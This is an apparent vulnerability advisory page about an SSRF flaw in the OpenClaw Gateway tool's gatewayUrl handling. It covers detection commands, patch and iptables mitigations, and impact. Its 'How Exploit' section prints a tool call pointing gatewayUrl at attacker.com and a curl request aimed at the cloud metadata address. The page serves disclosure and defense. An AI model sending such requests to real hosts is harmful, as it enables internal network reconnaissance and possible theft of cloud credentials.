(OpenClaw), SSRF/SSWSH, CVE-2026-?? (High)

Listen to this Post

The Gateway tool in OpenClaw versions up to 2026.2.13 contains a vulnerability where it accepts a tool-supplied `gatewayUrl` without sufficient validation or allowlisting. This flaw allows an attacker who can invoke certain tools to force the OpenClaw host to initiate outbound WebSocket connections to arbitrary user-specified targets, including internal network services like localhost, private IP addresses, or cloud metadata endpoints. The issue stems from tool call paths passing the override directly to the Gateway WebSocket client. While typically requiring authenticated access, this can lead to network probing and potential further interaction if the target supports WebSockets. The fix, implemented in commit c5406e1d2434be2ef6eb4d26d8f1798d718713f4, restricts overrides to the loopback address or the configured gateway URL, rejecting disallowed protocols, credentials, and non-root paths .
Platform:

npm (openclaw)

Version:

<= 2026.2.13

Vulnerability:

SSRF/Unvalidated URL

Severity:

High

Date:

2026-02-17

Prediction:

Next npm release

What Undercode Say:

Analytics

To identify if your OpenClaw instance is vulnerable or has been targeted, you can analyze logs for suspicious WebSocket connection attempts. The following commands can help audit your system:

Check OpenClaw logs for outbound connections to non-gateway IPs
sudo journalctl -u openclaw-gateway | grep -E "ws://|wss://" | grep -v "allowed.gateway.com"
Monitor active connections from the OpenClaw process for unusual destinations
sudo lsof -p $(pgrep openclaw) | grep ESTABLISHED
Search for gatewayUrl parameters in local access logs that point to external domains
grep -E "gatewayUrl=(http|ws)" /var/log/openclaw/access.log | grep -v "127.0.0.1"

How Exploit:

An attacker who can invoke a tool that accepts a `gatewayUrl` parameter can exploit this by setting it to a malicious endpoint. Below is a conceptual example of how the override might be triggered:

Example of a malicious tool call that exploits the vulnerability
openclaw tool call --name some-tool --param gatewayUrl="wss://attacker.com/websocket-path"

A more direct simulation of the exploit using `curl` against a local instance could look like this:

Attempt to force a connection to an internal service (e.g., cloud metadata IP)
curl -X POST http://localhost:18789/api/tool/call \
-H "Content-Type: application/json" \
-d '{"tool":"someTool", "parameters":{"gatewayUrl":"http://169.254.169.254/latest/meta-data/"}}'

Protection from this CVE

To protect your OpenClaw installation, immediately update to version `2026.2.14` or later once released. In the meantime, implement strict network controls to mitigate the risk.

Update OpenClaw to the patched version when available
npm install -g openclaw@latest
Iptables rule to block outbound WebSocket connections from OpenClaw to unauthorized networks
iptables -A OUTPUT -m owner --uid-owner $(id -u openclaw) -p tcp --dport 80 -m string --string "Upgrade: websocket" --algo bm -j DROP
iptables -A OUTPUT -m owner --uid-owner $(id -u openclaw) -p tcp --dport 443 -m string --string "Upgrade: websocket" --algo bm -j DROP
Enforce outbound connection restrictions at the application level via config
Add to your OpenClaw config file (~/.config/openclaw/config.toml):
[bash]
allowed_gateway_urls = ["wss://your-gateway.example.com", "ws://localhost:18789"]

Impact

In a standard deployment, this vulnerability allows an attacker to use the OpenClaw host as a proxy to perform limited network reconnaissance. They can probe for reachable services on internal networks, localhost, or cloud metadata services. If a target is reachable and speaks the WebSocket protocol, further unintended interaction may be possible . For environments where the tool caller can observe the results (e.g., error messages or timing), the issue becomes an information disclosure vector that maps internal network topology.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top